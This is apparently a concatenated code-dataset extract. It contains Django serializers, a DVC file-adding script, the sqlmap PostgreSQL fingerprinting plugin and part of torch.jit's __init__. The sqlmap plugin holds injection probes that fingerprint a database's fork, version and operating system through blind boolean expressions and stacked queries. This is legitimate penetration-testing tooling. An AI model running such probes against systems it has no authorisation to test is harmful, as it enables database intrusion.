        model = Product
        fields = [
            'seller',
            'id',
            'name',
            'description',
            'price'
        ]
| 25.700935 | 99 | 0.578182 | from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from enumfields.drf.serializers import EnumSupportSerializerMixin
from rest_framework.fields import SerializerMethodField
from rest_framework.serializers import (
ModelSerializer
)
from sorl_thumbnail_serializer.fields import HyperlinkedSorlImageField
from campaigns.models import Product, Campaign, CampaignPartyRelation, CampaignPartyRelationType, \
CampaignEnrollmentRequest
from team.serializers import TeamListSerializer
User = get_user_model()
class CampaignCreateSerializer(EnumSupportSerializerMixin, ModelSerializer):
class Meta:
model = Campaign
fields = [
'id',
'title',
'start_time',
'end_time',
'description',
]
class CampaignListSerializer(EnumSupportSerializerMixin, ModelSerializer):
creator = SerializerMethodField()
thumbnail = HyperlinkedSorlImageField(
'500x500',
options={"crop": "center"},
source='image',
read_only=True
)
class Meta:
model = Campaign
fields = [
'id',
'title',
'creator',
'start_time',
'end_time',
'description',
'thumbnail',
'image',
'width_field',
'height_field',
]
read_only_fields = [
'thumbnail',
'image',
'width_field',
'height_field',
]
def get_creator(self, obj):
return CampaignPartyRelation.objects.get(
campaign=obj,
type=CampaignPartyRelationType.CREATOR,
).content_object.name
class CampaignUpdateSerializer(EnumSupportSerializerMixin, ModelSerializer):
class Meta:
model = Campaign
fields = [
'id',
'title',
'start_time',
'end_time',
'description',
]
class CampaignDetailSerializer(EnumSupportSerializerMixin, ModelSerializer):
accessable = SerializerMethodField()
creator = SerializerMethodField()
requested = SerializerMethodField()
enrolled = SerializerMethodField()
thumbnail = HyperlinkedSorlImageField(
'500x500',
options={"crop": "center"},
source='profile_image',
read_only=True
)
class Meta:
model = Campaign
fields = [
'id',
'title',
'creator',
'type',
'description',
'start_time',
'end_time',
'accessable',
'requested',
'enrolled',
'thumbnail',
'image',
'width_field',
'height_field',
]
read_only_fields = [
'thumbnail',
'image',
'width_field',
'height_field',
]
def get_accessable(self, obj):
user = self.context.get('request').user
if user.is_authenticated and CampaignPartyRelation.objects.filter(
campaign=obj,
type=CampaignPartyRelationType.CREATOR,
content_type=ContentType.objects.get(model="profile"),
object_id=user.id
).exists():
return True
return False
def get_creator(self, obj):
return CampaignPartyRelation.objects.get(
campaign=obj,
type=CampaignPartyRelationType.CREATOR,
).content_object.name
def get_requested(self, obj):
user = self.context.get('request').user
if user.is_authenticated and CampaignEnrollmentRequest.objects.filter(
campaign=obj,
user=user
).exists():
return True
return False
def get_enrolled(self, obj):
user = self.context.get('request').user
if user.is_authenticated and CampaignPartyRelation.objects.filter(
campaign=obj,
type=CampaignPartyRelationType.MEMBER,
content_type=ContentType.objects.get(model="user"),
object_id=user.id
).exists():
return True
return False
class CampaignImageUpdateRetriveSerializer(ModelSerializer):
class Meta:
model = Campaign
fields = [
'image',
'width_field',
'height_field',
]
read_only_fields = [
'width_field',
'height_field',
]
class CampaignDeleteSerializer(EnumSupportSerializerMixin, ModelSerializer):
class Meta:
model = Campaign
fields = [
'id',
]
class CampaignRequestEnrollmentSerializer(ModelSerializer):
class Meta:
model = CampaignEnrollmentRequest
fields = [
'note'
]
class ProductCreateSerializer(ModelSerializer):
class Meta:
model = Product
fields = [
'name',
'description',
'price'
]
class ProductListSerializer(ModelSerializer):
seller = TeamListSerializer()
class Meta:
model = Product
fields = [
'seller',
'id',
'name',
'description',
'price'
]
| true | true |
f7fa577bbe138646112aa69c5b9324924fbdd88d | 483 | py | Python | data_into_dvc.py | EAKSHITHA/mlops_main | 84c5fe417e138ef3cbef1bf299ad653e60a6644a | [
"MIT"
] | null | null | null | data_into_dvc.py | EAKSHITHA/mlops_main | 84c5fe417e138ef3cbef1bf299ad653e60a6644a | [
"MIT"
] | null | null | null | data_into_dvc.py | EAKSHITHA/mlops_main | 84c5fe417e138ef3cbef1bf299ad653e60a6644a | [
"MIT"
] | null | null | null | # NOTE: For windows user-
# This file must be created in the root of the project,
# where the Training and Prediction batch-file folders are present.
import os
import subprocess
from glob import glob
from tqdm import tqdm

# Batch folders whose CSV files should be tracked by DVC.
data_dirs = ["Training_Batch_Files", "Prediction_Batch_files"]
for data_dir in data_dirs:
    files = glob(os.path.join(data_dir, "*.csv"))
    for filePath in tqdm(files):
        # Pass the path as a separate argv element (no shell) so file names
        # containing spaces or shell metacharacters cannot break or alter
        # the command; check=False mirrors os.system's ignore-status behavior.
        subprocess.run(["dvc", "add", filePath], check=False)
print("\n #### all files added to dvc ####") | 28.411765 | 61 | 0.691511 |
import os
from glob import glob
from tqdm import tqdm

# Batch-file folders expected to exist in the project root.
data_dirs = ["Training_Batch_Files","Prediction_Batch_files"]
for data_dir in data_dirs:
    files = glob(data_dir + r"/*.csv")
    for filePath in tqdm(files):
        # NOTE(review): shell interpolation breaks if the path contains
        # spaces or shell metacharacters; subprocess.run with an argument
        # list would be safer.
        os.system(f"dvc add {filePath}")
print("\n #### all files added to dvc ####")
f7fa57c65892d5f11374402f2ee7beaa40568a84 | 9,544 | py | Python | packages/sqlmap-master/plugins/dbms/postgresql/fingerprint.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | packages/sqlmap-master/plugins/dbms/postgresql/fingerprint.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | packages/sqlmap-master/plugins/dbms/postgresql/fingerprint.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import FORK
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import OS
from lib.core.session import setDbms
from lib.core.settings import PGSQL_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
    """PostgreSQL fingerprint plugin: identifies the DBMS, its fork,
    the server version range and the back-end operating system using
    blind boolean-expression probes."""

    def __init__(self):
        GenericFingerprint.__init__(self, DBMS.PGSQL)

    def getFingerprint(self):
        # Fork detection costs several injected requests, so the result
        # is cached in the session hash DB.
        fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)

        if fork is None:
            if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"):
                fork = FORK.COCKROACHDB
            elif inject.checkBooleanExpression("VERSION() LIKE '%Redshift%'"):  # Reference: https://dataedo.com/kb/query/amazon-redshift/check-server-version
                fork = FORK.REDSHIFT
            elif inject.checkBooleanExpression("VERSION() LIKE '%Greenplum%'"):  # Reference: http://www.sqldbpros.com/wordpress/wp-content/uploads/2014/08/what-version-of-greenplum.png
                fork = FORK.GREENPLUM
            elif inject.checkBooleanExpression("VERSION() LIKE '%Yellowbrick%'"):  # Reference: https://www.yellowbrick.com/docs/3.3/ybd_sqlref/version.html
                fork = FORK.YELLOWBRICK
            elif inject.checkBooleanExpression("VERSION() LIKE '%EnterpriseDB%'"):  # Reference: https://www.enterprisedb.com/edb-docs/d/edb-postgres-advanced-server/user-guides/user-guide/11/EDB_Postgres_Advanced_Server_Guide.1.087.html
                fork = FORK.ENTERPRISEDB
            elif inject.checkBooleanExpression("VERSION() LIKE '%YB-%'"):  # Reference: https://github.com/yugabyte/yugabyte-db/issues/2447#issue-499562926
                fork = FORK.YUGABYTEDB
            elif inject.checkBooleanExpression("AURORA_VERSION() LIKE '%'"):  # Reference: https://aws.amazon.com/premiumsupport/knowledge-center/aurora-version-number/
                fork = FORK.AURORA
            else:
                fork = ""

            hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)

        value = ""
        wsOsFp = Format.getOs("web server", kb.headersFp)

        if wsOsFp:
            value += "%s\n" % wsOsFp

        if kb.data.banner:
            dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)

            if dbmsOsFp:
                value += "%s\n" % dbmsOsFp

        value += "back-end DBMS: "

        # Without --fingerprint (extensiveFp) only report the DBMS name
        # (plus fork, when detected).
        if not conf.extensiveFp:
            value += DBMS.PGSQL

            if fork:
                value += " (%s fork)" % fork

            return value

        actVer = Format.getDbms()
        blank = " " * 15
        value += "active fingerprint: %s" % actVer

        if kb.bannerFp:
            banVer = kb.bannerFp.get("dbmsVersion")

            if banVer:
                banVer = Format.getDbms([banVer])
                value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

        htmlErrorFp = Format.getErrorParsedDBMSes()

        if htmlErrorFp:
            value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)

        if fork:
            value += "\n%sfork fingerprint: %s" % (blank, fork)

        return value

    def checkDbms(self):
        """
        Confirm the back-end DBMS is PostgreSQL and, with --fingerprint,
        narrow down the server version via feature probes.

        References for fingerprint:

        * https://www.postgresql.org/docs/current/static/release.html
        """

        if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):
            setDbms(DBMS.PGSQL)

            self.getBanner()

            return True

        infoMsg = "testing %s" % DBMS.PGSQL
        logger.info(infoMsg)

        # NOTE: Vertica works too without the CONVERT_TO()
        result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL")

        if result:
            infoMsg = "confirming %s" % DBMS.PGSQL
            logger.info(infoMsg)

            result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]")

            if not result:
                warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
                logger.warn(warnMsg)

                return False

            setDbms(DBMS.PGSQL)

            self.getBanner()

            if not conf.extensiveFp:
                return True

            infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
            logger.info(infoMsg)

            # Version ladder: each probe uses a function/syntax first
            # available in the given release, newest first, so the first
            # expression that evaluates true bounds the server version.
            if inject.checkBooleanExpression("GEN_RANDOM_UUID() IS NOT NULL"):
                Backend.setVersion(">= 13.0")
            elif inject.checkBooleanExpression("SINH(0)=0"):
                Backend.setVersion(">= 12.0")
            elif inject.checkBooleanExpression("SHA256(NULL) IS NULL"):
                Backend.setVersion(">= 11.0")
            elif inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"):
                Backend.setVersionList([">= 10.0", "< 11.0"])
            elif inject.checkBooleanExpression("SIND(0)=0"):
                Backend.setVersionList([">= 9.6.0", "< 10.0"])
            elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
                Backend.setVersionList([">= 9.5.0", "< 9.6.0"])
            elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
                Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
            elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
                Backend.setVersionList([">= 9.3.0", "< 9.4.0"])
            elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"):
                Backend.setVersionList([">= 9.2.0", "< 9.3.0"])
            elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
                Backend.setVersionList([">= 9.1.0", "< 9.2.0"])
            elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"):
                Backend.setVersionList([">= 9.0.0", "< 9.1.0"])
            elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"):
                Backend.setVersionList([">= 8.4.0", "< 9.0.0"])
            elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"):
                Backend.setVersionList([">= 8.3.0", "< 8.4.0"])
            elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"):
                Backend.setVersionList([">= 8.2.0", "< 8.3.0"])
            elif inject.checkBooleanExpression("9=(SELECT GREATEST(5,9,1))"):
                Backend.setVersionList([">= 8.1.0", "< 8.2.0"])
            elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35,0.024,10.06,5))"):
                Backend.setVersionList([">= 8.0.0", "< 8.1.0"])
            elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'),1,1))"):
                Backend.setVersionList([">= 7.4.0", "< 8.0.0"])
            elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(),1,1))"):
                Backend.setVersionList([">= 7.3.0", "< 7.4.0"])
            elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"):
                Backend.setVersionList([">= 7.2.0", "< 7.3.0"])
            elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'),2,1))"):
                Backend.setVersionList([">= 7.1.0", "< 7.2.0"])
            elif inject.checkBooleanExpression("8=(SELECT POW(2,3))"):
                Backend.setVersionList([">= 7.0.0", "< 7.1.0"])
            elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"):
                Backend.setVersionList([">= 6.5.0", "< 6.5.3"])
            elif inject.checkBooleanExpression("VERSION()=VERSION()"):
                Backend.setVersionList([">= 6.4.0", "< 6.5.0"])
            elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE,1,1))"):
                Backend.setVersionList([">= 6.3.0", "< 6.4.0"])
            elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap',1,1))"):
                Backend.setVersionList([">= 6.2.0", "< 6.3.0"])
            else:
                Backend.setVersion("< 6.2.0")

            return True
        else:
            warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
            logger.warn(warnMsg)

            return False

    def checkDbmsOs(self, detailed=False):
        # Skip if the OS has already been identified elsewhere.
        if Backend.getOs():
            return

        infoMsg = "fingerprinting the back-end DBMS operating system"
        logger.info(infoMsg)

        # Write VERSION() into a temporary support table so its content
        # can be probed with LIKE expressions.
        self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)")
        inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()"))

        # Windows executables should always have ' Visual C++' or ' mingw'
        # patterns within the banner
        osWindows = (" Visual C++", "mingw")

        for osPattern in osWindows:
            query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
            query += "LIKE '%" + osPattern + "%')>0"

            if inject.checkBooleanExpression(query):
                Backend.setOs(OS.WINDOWS)

                break

        # Default to Linux when no Windows toolchain marker was found.
        if Backend.getOs() is None:
            Backend.setOs(OS.LINUX)

        infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
        logger.info(infoMsg)

        self.cleanup(onlyFileTbl=True)
| 42.607143 | 237 | 0.588433 |
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import FORK
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import OS
from lib.core.session import setDbms
from lib.core.settings import PGSQL_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
    """PostgreSQL fingerprint plugin: detects the DBMS, its fork, the
    server version range and the back-end OS via blind boolean probes."""

    def __init__(self):
        GenericFingerprint.__init__(self, DBMS.PGSQL)

    def getFingerprint(self):
        # Fork detection is cached in the session hash DB.
        fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
        if fork is None:
            # Each probe matches a fork-specific marker in VERSION()
            # (or a fork-only function, for Aurora).
            if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"):
                fork = FORK.COCKROACHDB
            elif inject.checkBooleanExpression("VERSION() LIKE '%Redshift%'"):
                fork = FORK.REDSHIFT
            elif inject.checkBooleanExpression("VERSION() LIKE '%Greenplum%'"):
                fork = FORK.GREENPLUM
            elif inject.checkBooleanExpression("VERSION() LIKE '%Yellowbrick%'"):
                fork = FORK.YELLOWBRICK
            elif inject.checkBooleanExpression("VERSION() LIKE '%EnterpriseDB%'"):
                fork = FORK.ENTERPRISEDB
            elif inject.checkBooleanExpression("VERSION() LIKE '%YB-%'"):
                fork = FORK.YUGABYTEDB
            elif inject.checkBooleanExpression("AURORA_VERSION() LIKE '%'"):
                fork = FORK.AURORA
            else:
                fork = ""
            hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)
        value = ""
        wsOsFp = Format.getOs("web server", kb.headersFp)
        if wsOsFp:
            value += "%s\n" % wsOsFp
        if kb.data.banner:
            dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
            if dbmsOsFp:
                value += "%s\n" % dbmsOsFp
        value += "back-end DBMS: "
        # Without --fingerprint only the DBMS name (plus fork) is shown.
        if not conf.extensiveFp:
            value += DBMS.PGSQL
            if fork:
                value += " (%s fork)" % fork
            return value
        actVer = Format.getDbms()
        blank = " " * 15
        value += "active fingerprint: %s" % actVer
        if kb.bannerFp:
            banVer = kb.bannerFp.get("dbmsVersion")
            if banVer:
                banVer = Format.getDbms([banVer])
                value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
        htmlErrorFp = Format.getErrorParsedDBMSes()
        if htmlErrorFp:
            value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
        if fork:
            value += "\n%sfork fingerprint: %s" % (blank, fork)
        return value

    def checkDbms(self):
        """Confirm the DBMS is PostgreSQL; with --fingerprint, narrow
        down the server version via the feature-probe ladder below."""
        if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):
            setDbms(DBMS.PGSQL)
            self.getBanner()
            return True
        infoMsg = "testing %s" % DBMS.PGSQL
        logger.info(infoMsg)
        result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL")
        if result:
            infoMsg = "confirming %s" % DBMS.PGSQL
            logger.info(infoMsg)
            result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]")
            if not result:
                warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
                logger.warn(warnMsg)
                return False
            setDbms(DBMS.PGSQL)
            self.getBanner()
            if not conf.extensiveFp:
                return True
            infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
            logger.info(infoMsg)
            # Version ladder, newest first: each expression relies on a
            # function/syntax introduced in that release, so the first
            # true probe bounds the server version.
            if inject.checkBooleanExpression("GEN_RANDOM_UUID() IS NOT NULL"):
                Backend.setVersion(">= 13.0")
            elif inject.checkBooleanExpression("SINH(0)=0"):
                Backend.setVersion(">= 12.0")
            elif inject.checkBooleanExpression("SHA256(NULL) IS NULL"):
                Backend.setVersion(">= 11.0")
            elif inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"):
                Backend.setVersionList([">= 10.0", "< 11.0"])
            elif inject.checkBooleanExpression("SIND(0)=0"):
                Backend.setVersionList([">= 9.6.0", "< 10.0"])
            elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
                Backend.setVersionList([">= 9.5.0", "< 9.6.0"])
            elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
                Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
            elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
                Backend.setVersionList([">= 9.3.0", "< 9.4.0"])
            elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"):
                Backend.setVersionList([">= 9.2.0", "< 9.3.0"])
            elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
                Backend.setVersionList([">= 9.1.0", "< 9.2.0"])
            elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"):
                Backend.setVersionList([">= 9.0.0", "< 9.1.0"])
            elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"):
                Backend.setVersionList([">= 8.4.0", "< 9.0.0"])
            elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"):
                Backend.setVersionList([">= 8.3.0", "< 8.4.0"])
            elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"):
                Backend.setVersionList([">= 8.2.0", "< 8.3.0"])
            elif inject.checkBooleanExpression("9=(SELECT GREATEST(5,9,1))"):
                Backend.setVersionList([">= 8.1.0", "< 8.2.0"])
            elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35,0.024,10.06,5))"):
                Backend.setVersionList([">= 8.0.0", "< 8.1.0"])
            elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'),1,1))"):
                Backend.setVersionList([">= 7.4.0", "< 8.0.0"])
            elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(),1,1))"):
                Backend.setVersionList([">= 7.3.0", "< 7.4.0"])
            elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"):
                Backend.setVersionList([">= 7.2.0", "< 7.3.0"])
            elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'),2,1))"):
                Backend.setVersionList([">= 7.1.0", "< 7.2.0"])
            elif inject.checkBooleanExpression("8=(SELECT POW(2,3))"):
                Backend.setVersionList([">= 7.0.0", "< 7.1.0"])
            elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"):
                Backend.setVersionList([">= 6.5.0", "< 6.5.3"])
            elif inject.checkBooleanExpression("VERSION()=VERSION()"):
                Backend.setVersionList([">= 6.4.0", "< 6.5.0"])
            elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE,1,1))"):
                Backend.setVersionList([">= 6.3.0", "< 6.4.0"])
            elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap',1,1))"):
                Backend.setVersionList([">= 6.2.0", "< 6.3.0"])
            else:
                Backend.setVersion("< 6.2.0")
            return True
        else:
            warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
            logger.warn(warnMsg)
            return False

    def checkDbmsOs(self, detailed=False):
        # Skip if the OS has already been identified.
        if Backend.getOs():
            return
        infoMsg = "fingerprinting the back-end DBMS operating system"
        logger.info(infoMsg)
        # Write VERSION() into a temporary support table so its content
        # can be probed with LIKE expressions.
        self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)")
        inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()"))
        # Windows builds carry a toolchain marker in the version banner.
        osWindows = (" Visual C++", "mingw")
        for osPattern in osWindows:
            query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
            query += "LIKE '%" + osPattern + "%')>0"
            if inject.checkBooleanExpression(query):
                Backend.setOs(OS.WINDOWS)
                break
        # Default to Linux when no Windows marker was found.
        if Backend.getOs() is None:
            Backend.setOs(OS.LINUX)
        infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
        logger.info(infoMsg)
        self.cleanup(onlyFileTbl=True)
| true | true |
f7fa58bd3643415f06359217c1633d15d0f8ee98 | 6,463 | py | Python | torch/jit/__init__.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 60,067 | 2017-01-18T17:21:31.000Z | 2022-03-31T21:37:45.000Z | torch/jit/__init__.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 66,955 | 2017-01-18T17:21:38.000Z | 2022-03-31T23:56:11.000Z | torch/jit/__init__.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 19,210 | 2017-01-18T17:45:04.000Z | 2022-03-31T23:51:56.000Z | import torch._C
from contextlib import contextmanager
from typing import Iterator
from torch.utils import set_module
# These are imported so users can access them from the `torch.jit` module
from torch._jit_internal import (
Final,
Future,
_IgnoreContextManager,
_overload,
_overload_method,
ignore,
_isinstance,
is_scripting,
export,
unused,
)
from torch.jit._script import (
script,
Attribute,
ScriptModule,
script_method,
RecursiveScriptClass,
RecursiveScriptModule,
ScriptWarning,
interface,
CompilationUnit,
ScriptFunction,
_ScriptProfile,
_unwrap_optional,
)
from torch.jit._trace import (
trace,
trace_module,
TracedModule,
TracerWarning,
TracingCheckError,
is_tracing,
ONNXTracedModule,
TopLevelTracedModule,
_unique_state_dict,
_flatten,
_script_if_tracing,
_get_trace_graph,
)
from torch.jit._async import fork, wait
from torch.jit._serialization import save, load
from torch.jit._fuser import optimized_execution, fuser, last_executed_optimized_graph
from torch.jit._freeze import freeze, optimize_for_inference, run_frozen_optimizations
# For backwards compatibility
# Older code imported these private aliases; keep them pointing at the
# public fork/wait implementations.
_fork = fork
_wait = wait
def export_opnames(m):
    r"""Return the operator names that freshly generated bytecode for the
    given Script module would reference, based on the current code base.

    If you already have a LiteScriptModule and want the ops it currently
    contains, call _export_operator_list instead.
    """
    compiled_module = m._c
    return torch._C._export_opnames(compiled_module)
# torch.jit.Error
Error = torch._C.JITException
set_module(Error, "torch.jit")
# This is not perfect but works in common cases
# Re-point the C++ exception's reported name/qualname so it renders as
# ``torch.jit.Error`` in tracebacks and documentation.
Error.__name__ = "Error"
Error.__qualname__ = "Error"
# for use in python if using annotate
def annotate(the_type, the_value):
    """Hint the TorchScript compiler that `the_value` has type `the_type`.

    In eager (non-scripted) execution this is a pure pass-through: the
    hint is consumed statically by the compiler, so at runtime the value
    is returned unchanged.

    Useful where type inference would otherwise be wrong, e.g. empty
    containers (`[]`, `{}` default to containers of `Tensor`) or values
    of type `T` assigned to an `Optional[T]` slot.

    Note: this does not help inside `torch.nn.Module.__init__`, which
    runs eagerly; use :meth:`~torch.jit.Annotate` for module attributes.

    Args:
        the_type: Python type passed to the TorchScript compiler as the
            hint for `the_value`.
        the_value: Value or expression whose type is being hinted.

    Returns:
        `the_value`, unchanged.
    """
    # Nothing to do at runtime; the compiler reads the hint from source.
    return the_value
def script_if_tracing(fn):
    """Compile ``fn`` with ``torch.jit.script`` lazily, on its first call
    during tracing.

    ``torch.jit.script`` has a non-negligible start-up cost the first time
    it runs (lazy initialization of compiler builtins), so library code
    should avoid calling it eagerly. Decorating with
    ``@torch.jit.script_if_tracing`` defers compilation until the function
    is actually invoked while a trace is being recorded; outside of
    tracing the original Python function runs.

    Args:
        fn: A function to compile.

    Returns:
        If called during tracing, a :class:`ScriptFunction` created by
        `torch.jit.script`; otherwise the original function `fn`.
    """
    deferred = _script_if_tracing(fn)
    return deferred
# for torch.jit.isinstance
def isinstance(obj, target_type):
    """Type refinement for TorchScript, including parameterized containers.

    Refines `obj` against `target_type`, which may be a parameterized
    container type such as ``List[str]``, ``Dict[str, List[torch.Tensor]]``
    or ``Optional[Tuple[int, str, int]]``, as well as basic TorchScript
    types like ``bool`` and ``int``.

    Args:
        obj: object whose type should be refined.
        target_type: type to try to refine `obj` to.

    Returns:
        ``bool``: True if `obj` was successfully refined to `target_type`,
        False otherwise (no new refinement).

    Example (type refinement inside a scripted module)::

        def forward(self, input: Any):
            if torch.jit.isinstance(input, List[torch.Tensor]):
                ...
            elif torch.jit.isinstance(input, Dict[str, str]):
                ...
    """
    refined = _isinstance(obj, target_type)
    return refined
# Context manager for globally hiding source ranges when printing graphs.
# Note that these functions are exposed to Python as static members of the
# Graph class, so mypy checks need to be skipped.
@contextmanager
def _hide_source_ranges() -> Iterator[None]:
old_enable_source_ranges = torch._C.Graph.global_print_source_ranges # type: ignore[attr-defined]
try:
torch._C.Graph.set_global_print_source_ranges(False) # type: ignore[attr-defined]
yield
finally:
torch._C.Graph.set_global_print_source_ranges(old_enable_source_ranges) # type: ignore[attr-defined]
# Initialize the JIT C++ runtime at import time; fail fast if it cannot
# be brought up, since none of the bindings above would work without it.
if not torch._C._jit_init():
    raise RuntimeError("JIT initialization failed")
| 31.837438 | 109 | 0.677704 | import torch._C
from contextlib import contextmanager
from typing import Iterator
from torch.utils import set_module
from torch._jit_internal import (
Final,
Future,
_IgnoreContextManager,
_overload,
_overload_method,
ignore,
_isinstance,
is_scripting,
export,
unused,
)
from torch.jit._script import (
script,
Attribute,
ScriptModule,
script_method,
RecursiveScriptClass,
RecursiveScriptModule,
ScriptWarning,
interface,
CompilationUnit,
ScriptFunction,
_ScriptProfile,
_unwrap_optional,
)
from torch.jit._trace import (
trace,
trace_module,
TracedModule,
TracerWarning,
TracingCheckError,
is_tracing,
ONNXTracedModule,
TopLevelTracedModule,
_unique_state_dict,
_flatten,
_script_if_tracing,
_get_trace_graph,
)
from torch.jit._async import fork, wait
from torch.jit._serialization import save, load
from torch.jit._fuser import optimized_execution, fuser, last_executed_optimized_graph
from torch.jit._freeze import freeze, optimize_for_inference, run_frozen_optimizations
# Backwards-compatible private aliases for the public fork/wait API.
_fork = fork
_wait = wait
def export_opnames(m):
    """Return the op names that regenerated bytecode for Script module
    ``m`` would reference, based on the current code base."""
    return torch._C._export_opnames(m._c)
# Expose the C++ JIT exception as torch.jit.Error with a Pythonic name.
Error = torch._C.JITException
set_module(Error, "torch.jit")
Error.__name__ = "Error"
Error.__qualname__ = "Error"
def annotate(the_type, the_value):
    """TorchScript type hint for `the_value`; a no-op pass-through when
    executed eagerly (the compiler consumes the hint statically)."""
    return the_value
def script_if_tracing(fn):
    """Defer ``torch.jit.script`` compilation of ``fn`` until its first
    call during tracing; outside of tracing ``fn`` runs as plain Python."""
    return _script_if_tracing(fn)
def isinstance(obj, target_type):
    """Container-aware ``isinstance`` usable for TorchScript type
    refinement (supports e.g. ``List[str]``, ``Dict[str, int]``)."""
    return _isinstance(obj, target_type)
@contextmanager
def _hide_source_ranges() -> Iterator[None]:
